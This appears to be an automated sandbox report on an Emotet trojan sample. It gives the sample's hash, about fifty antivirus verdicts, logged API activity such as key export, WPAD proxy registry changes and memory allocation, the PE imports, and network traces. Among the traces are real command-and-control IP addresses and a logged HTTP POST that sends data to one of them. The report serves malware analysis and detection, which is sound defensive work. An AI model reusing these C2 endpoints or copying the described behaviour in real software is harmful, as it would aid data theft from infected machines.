6.6
高危
56 个模型检测该样本为恶意!
重新分析
更多

035ae1de68972b25c8533db5e5bcce38808ed01c1c85051b641e429d88ef5b39

c8b8abaff59781669ab8f6348b0e5376.exe

分析耗时

77s

最近分析

文件大小

540.1KB
静态报毒 动态报毒 100% AI SCORE=83 AMGMEUUCPFG ATTRIBUTE BANKERX BSCOPE CLASSIC CONFIDENCE EMOTET GENCIRC GENERICKDZ GENETIC GENKRYPTIK HGIASOCA HIGH CONFIDENCE HIGHCONFIDENCE HTKYLK KCLOUD MALWARE@#N1PVD59GVUNS QCXT R + TROJ R349766 SCORE SUSGEN TROJAN2 TROJANBANKER UNSAFE WUKDQ 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FQS!C8B8ABAFF597 20210222 6.0.6.653
Alibaba Trojan:Win32/Emotet.05f1404a 20190527 0.3.0.5
Avast Win32:BankerX-gen [Trj] 20210222 21.1.5827.0
Baidu 20190318 1.0.0.2
Kingsoft Win32.Troj.Banker.(kcloud) 20210222 2017.9.26.565
Tencent Malware.Win32.Gencirc.10cdf98b 20210222 1.0.0.1
CrowdStrike win/malicious_confidence_100% (W) 20210203 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1620897738.588822
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1620897722.588822
CryptGenKey
crypto_handle: 0x003cb8f0
algorithm_identifier: 0x0000660e ()
provider_handle: 0x003145c0
flags: 1
key: fÓSÚPÁRn™ ŽTriÖ
success 1 0
1620897738.604822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤jW¦Yi]­EUuXÝHÓ¡ídÓ!ƒ%ÍØî˞SA~`S2îf*Ëk×ÈÒøhù[ËwP£?#I¶„§Ö ³?ƒ3fÊ{=¶MúuQ²9Ön6]滨Bg…
blob_type: 1
flags: 64
success 1 0
1620897774.760822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤*\jVÞFÊÐ= 4û".ŽÁ’÷⩺T9”¨lßFû¨¾A³EÉxk*-‰¯B•›}¦‹±“×ö£LùïaåK¼(í¹ Û3:­{ F⍧ž•VëÎi·á&
blob_type: 1
flags: 64
success 1 0
1620897779.447822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤MÌiÍç‰Pè_¤vÅa€{’ÿ]Á4l¨JÜ/ö ¢´g½Ú,'Wº‰q*ñ“î<wî\“‚ }.ٜ0VS œV›üjˆ)R¹xU¸ Ë`Á‹WÙ*o˪ápm>­d9
blob_type: 1
flags: 64
success 1 0
1620897783.244822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤1Ô½­Ð+V€ú5ât¡›'Õçµ:dÖ jp¼hþ_ex>œ3—½v¸,pR÷•`åÊëIƔÅCQÏ:VHÑ]¶óÏg°Ú’©Eø+%xÇW|*ݜ*û#»NEéÌ|)Ë
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1620897722.104822
NtAllocateVirtualMemory
process_identifier: 3060
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01e30000
success 0 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1620897739.119822
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process c8b8abaff59781669ab8f6348b0e5376.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1620897738.791822
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (7 个事件)
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
host 203.208.40.98
host 203.208.41.33
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1620897741.697822
RegSetValueExA
key_handle: 0x00000394
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x00000394
value: p5ÇÝH×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x00000394
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620897741.697822
RegSetValueExW
key_handle: 0x00000394
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x000003ac
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x000003ac
value: p5ÇÝH×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x000003ac
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620897741.729822
RegSetValueExW
key_handle: 0x00000390
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 个事件)
Elastic malicious (high confidence)
DrWeb Trojan.Emotet.1005
MicroWorld-eScan Trojan.GenericKDZ.69772
FireEye Generic.mg.c8b8abaff5978166
McAfee Emotet-FQS!C8B8ABAFF597
Cylance Unsafe
Zillya Trojan.Emotet.Win32.27695
Sangfor Trojan.Win32.Emotet.PED
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Emotet.05f1404a
K7GW Riskware ( 0040eff71 )
Cybereason malicious.ff5978
Arcabit Trojan.Generic.D1108C
Cyren W32/Trojan2.QCXT
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Keylogger.Emotet-9775410-0
Kaspersky HEUR:Trojan-Banker.Win32.Emotet.pef
BitDefender Trojan.GenericKDZ.69772
NANO-Antivirus Trojan.Win32.Emotet.htkylk
Paloalto generic.ml
Rising Trojan.Emotet!1.CB4A (CLASSIC)
Ad-Aware Trojan.GenericKDZ.69772
Sophos Mal/Generic-R + Troj/Emotet-CMC
Comodo Malware@#n1pvd59gvuns
F-Secure Trojan.TR/Emotet.wukdq
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition Emotet-FQS!C8B8ABAFF597
Emsisoft Trojan.GenericKDZ.69772 (B)
Jiangmin Trojan.Banker.Emotet.ofu
eGambit Generic.Malware
Avira TR/Emotet.wukdq
MAX malware (ai score=83)
Antiy-AVL Trojan[Banker]/Win32.Emotet
Kingsoft Win32.Troj.Banker.(kcloud)
Gridinsoft Trojan.Win32.Emotet.oa
Microsoft Trojan:Win32/Emotet.PED!MTB
AegisLab Trojan.Win32.Emotet.L!c
ZoneAlarm HEUR:Trojan-Banker.Win32.Emotet.pef
GData Trojan.GenericKDZ.69772
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Emotet.R349766
VBA32 BScope.TrojanBanker.Emotet
ALYac Trojan.Agent.Emotet
Malwarebytes Emotet.Trojan.Stealer.DDS
ESET-NOD32 Win32/Emotet.CD
Tencent Malware.Win32.Gencirc.10cdf98b
Yandex Trojan.GenKryptik!AmgmeuuCpfg
Ikarus Trojan-Banker.Emotet
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 个事件)
dead_host 162.144.42.60:8080
dead_host 24.26.151.3:80
dead_host 192.168.56.101:49185
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-08-28 00:19:03

Imports

Library MFC42.DLL:
0x419090
0x419094
0x419098
0x41909c
0x4190a0
0x4190a4
0x4190a8
0x4190ac
0x4190b0
0x4190b4
0x4190b8
0x4190bc
0x4190c0
0x4190c4
0x4190c8
0x4190cc
0x4190d0
0x4190d4
0x4190d8
0x4190dc
0x4190e0
0x4190e4
0x4190e8
0x4190ec
0x4190f0
0x4190f4
0x4190f8
0x4190fc
0x419100
0x419104
0x419108
0x41910c
0x419110
0x419114
0x419118
0x41911c
0x419120
0x419124
0x419128
0x41912c
0x419130
0x419134
0x419138
0x41913c
0x419140
0x419144
0x419148
0x41914c
0x419150
0x419154
0x419158
0x41915c
0x419160
0x419164
0x419168
0x41916c
0x419170
0x419174
0x419178
0x41917c
0x419180
0x419184
0x419188
0x41918c
0x419190
0x419194
0x419198
0x41919c
0x4191a0
0x4191a4
0x4191a8
0x4191ac
0x4191b0
0x4191b4
0x4191b8
0x4191bc
0x4191c0
0x4191c4
0x4191c8
0x4191cc
0x4191d0
0x4191d4
0x4191d8
0x4191dc
0x4191e0
0x4191e4
0x4191e8
0x4191ec
0x4191f0
0x4191f4
0x4191f8
0x4191fc
0x419200
0x419204
0x419208
0x41920c
0x419210
0x419214
0x419218
0x41921c
0x419220
0x419224
0x419228
0x41922c
0x419230
0x419234
0x419238
0x41923c
0x419240
0x419244
0x419248
0x41924c
0x419250
0x419254
0x419258
0x41925c
0x419260
0x419264
0x419268
0x41926c
0x419270
0x419274
0x419278
0x41927c
0x419280
0x419284
0x419288
0x41928c
0x419290
0x419294
0x419298
0x41929c
0x4192a0
0x4192a4
0x4192a8
0x4192ac
0x4192b0
0x4192b4
0x4192b8
0x4192bc
0x4192c0
0x4192c4
0x4192c8
0x4192cc
0x4192d0
Library MSVCRT.dll:
0x4192ec _except_handler3
0x4192f0 _setmbcp
0x4192f4 __CxxFrameHandler
0x4192f8 _EH_prolog
0x4192fc memset
0x419300 strlen
0x419304 _ftol
0x419308 _mbsnbcpy
0x41930c _wcslwr
0x419310 malloc
0x419314 _mbsstr
0x419318 __dllonexit
0x41931c _onexit
0x419320 _exit
0x419324 _XcptFilter
0x419328 exit
0x41932c _acmdln
0x419330 __getmainargs
0x419334 _initterm
0x419338 __setusermatherr
0x41933c _adjust_fdiv
0x419340 __p__commode
0x419344 __p__fmode
0x419348 __set_app_type
0x41934c _controlfp
Library KERNEL32.dll:
0x419058 GetStartupInfoA
0x41905c GetModuleHandleA
0x419060 ExitProcess
0x419064 GetLastError
0x419068 VirtualAlloc
0x41906c FreeLibrary
0x419070 LoadLibraryA
0x419078 lstrcpyA
0x41907c WinExec
0x419080 lstrlenA
0x419084 GetProcAddress
0x419088 lstrcatA
Library USER32.dll:
0x419360 LoadIconA
0x419364 InSendMessage
0x419368 CreateWindowExA
0x41936c ShowWindow
0x419370 KillTimer
0x419374 SetWindowLongA
0x419378 GetIconInfo
0x41937c SetTimer
0x419380 PtInRect
0x419384 ScreenToClient
0x419388 GetMessagePos
0x41938c IsWindow
0x419390 CopyIcon
0x419394 LoadCursorA
0x419398 GetDC
0x41939c CreateIconIndirect
0x4193a0 EnableWindow
0x4193a4 FillRect
0x4193a8 DrawStateA
0x4193ac GetClientRect
0x4193b0 CopyRect
0x4193b4 FrameRect
0x4193b8 InflateRect
0x4193bc GetSysColor
0x4193c0 OffsetRect
0x4193c4 DrawFocusRect
0x4193c8 GetWindowRect
0x4193cc GetSubMenu
0x4193d0 TrackPopupMenuEx
0x4193d4 PostMessageA
0x4193d8 ClientToScreen
0x4193dc WindowFromPoint
0x4193e0 GetActiveWindow
0x4193e4 InvalidateRect
0x4193e8 LoadMenuA
0x4193ec ReleaseDC
0x4193f0 LoadImageA
0x4193f4 SetCursor
0x4193f8 GetParent
0x4193fc GetNextDlgTabItem
0x419400 SendMessageA
0x419404 GetWindowLongA
0x419408 DestroyIcon
0x41940c DestroyCursor
0x419410 DestroyMenu
0x419414 MessageBeep
Library GDI32.dll:
0x41901c CreateFontIndirectA
0x419020 GetObjectA
0x419024 GetPixel
0x419028 SetPixel
0x41902c CreateBitmap
0x419030 DeleteObject
0x419034 GetStockObject
0x419038 SelectObject
0x419040 CreateCompatibleDC
0x419044 BitBlt
0x419048 DeleteDC
0x41904c SetTextColor
0x419050 SetBkColor
Library ADVAPI32.dll:
0x419000 RegQueryValueA
0x419004 RegOpenKeyExA
0x419008 RegCloseKey
Library SHELL32.dll:
0x419354 ShellExecuteExA
0x419358 ShellExecuteA
Library COMCTL32.dll:
0x419010 _TrackMouseEvent
Library MSVCP60.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49187 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/lDBb/0mCoFD/hjiTbwZ3CHcy3hNx/ 
POST /lDBb/0mCoFD/hjiTbwZ3CHcy3hNx/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------48faa8ad497c335a2d27a96a7b95614f
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.